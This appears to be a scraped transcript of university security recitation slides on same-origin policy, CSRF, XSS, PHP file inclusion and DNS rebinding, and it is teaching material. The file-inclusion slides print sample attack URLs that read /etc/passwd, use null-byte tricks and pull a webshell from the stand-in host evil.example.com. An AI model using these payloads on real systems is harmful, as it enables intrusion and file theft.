Introduction to infosec recitation 9
This presentation is the property of its rightful owner.
Sponsored Links
1 / 18

Introduction to InfoSec – Recitation 9 PowerPoint PPT Presentation


  • 90 Views
  • Uploaded on
  • Presentation posted in: General

Introduction to InfoSec – Recitation 9. Nir Krakowski ( nirkrako at post.tau.ac.il) Itamar Gilad ( itamargi at post.tau.ac.il). Today. SOP - Same origin policy CSRF – Cross site request Forgery XSS – Cross Site Scripting PHP file inclusion vulnerabilities

Download Presentation

Introduction to InfoSec – Recitation 9

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Introduction to infosec recitation 9

Introduction to InfoSec – Recitation 9

Nir Krakowski (nirkrako at post.tau.ac.il)

ItamarGilad (itamargi at post.tau.ac.il)


Today

Today

  • SOP - Same origin policy

  • CSRF – Cross site request Forgery

  • XSS – Cross Site Scripting

  • PHP file inclusion vulnerabilities

  • DNS rebinding (if we have time)


Same origin policy

Same Origin Policy

  • Modern sites use elements from many different sources (e.g.: main content, embedded ads, embedded google maps controls, embedded twitter feed, etc.)

  • Without the SOP – we’d have to trust ALL that code

  • With the SOP – interactions are limited by ‘origin’

  • An origin is the combination of domain name and protocol type


Sop examples

SOP examples


Cross site request forgery

Cross Site Request Forgery

  • User goes to malicious site

  • Site initiates a request to a different site (e.g.: Gmail)

  • Request is sent using user’s credentials

  • Site accepts request, but due to SOP – the attacker cannot read contents or state (‘blind’ attack)

  • Profit!


Csrf limitations

CSRF - Limitations

  • Cannot spoof referrer header (but few sites check it)

  • Depends on a ‘GET’ request to cause side-effects

  • Blind attack – if the attack depends on any prior info, attacker has to guess

  • Attack must take place while the user is logged in to the target site


Xss cross site scripting

XSS – Cross site scripting

  • Today, many sites just aggragate user-generated content

    • Forums

    • Facebook / Twitter / Reddit

    • Web mail

    • Ynet / nrg – ‘talkbacks’

  • That’s great, but what happens if we trust user submitted content?

  • A user can submit HTML code

  • Which can be malicious


How malicious are they

How malicious are they?

  • Once the malicious code runs in the context of the target site, it can do whatever the original site can

    • Steal javascript-accessible cookies

    • Use any aspect of the site’s API

      • Write posts

      • Add friends

      • Delete all user content

      • Send out mass-email

      • E.g.: Sammy is my hero


Non persistent xss

Non persistent XSS

  • User clicks a link with extra parameters, the server reflects it back, without proper sanitation


Persistent xss

Persistent XSS

  • Malicious user submits content to the target site via

    • Forum post / ‘talkback’ / FB post, twitter post

    • E-mail

    • Etc.

  • Content is not sanitized, and therefore – displayed to the user

  • The user’s browser treats it as code from the target site, thereby bypassing the SOP

  • Profit!


Php file inclusion

PHP File Inclusion

Source: Wikipedia


Php file inclusion cont

PHP File Inclusion cont.

  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)

  • /vulnerable.php?COLOR=C:\\notes.txt%00 - example using NULLs to remove the .phpsuffix, allowing access to files other than .php

  • /vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal

  • /vulnerable.php?COLOR=http://evil.example.com/webshell.txt?- injects a remotely hosted file containing a malicious code


Questions

Questions?


Dns rebinding csrf

DNS Rebinding CSRF

  • We’ll discuss a very specific example

  • Client has a home router, which we want to access

  • We can get the client to browse to attacker.com

  • But thanks for the SOP – JS code from attacker.com cannot access the router other than blindly (CSRF)


Enter dns rebinding

Enter DNS Rebinding

  • The DNS for attacker.com returns two records:

    • Our web server public address

    • The requesting client’s address

  • By default, a browser will use the first address, and download our malicious JavaScript

  • That Javascript will make another request to attacker.com

  • But this time – the server will refuse the connection

  • The browser will happily try the next entry


Dns rebinding cont

DNS Rebinding cont.

  • But that’s the client’s home router public address…

  • Which should be protected via a FW from access…

  • But since most routers are configured with interface-based rules, and have internal webservers that listen on 0.0.0.0:80 – it won’t matter – they will answer our client

  • So now our JS code can connect to attacker.com and access the home router!

  • And it can still connect back outside


Dns rebinding doesn t work anymore

DNS Rebinding doesn’t work anymore

  • Most routers will use HTTP-authentication

  • You used to be able to browse to: http://user:[email protected]/

  • But it has been disabled. All HTTP auth now requires a user dialog

  • Which makes the attack non-feasible

  • Also, there are some browser and network mitigations one can do (DNS pinning, DNS filtering, NoScript, etc.)


Questions1

Questions?


  • Login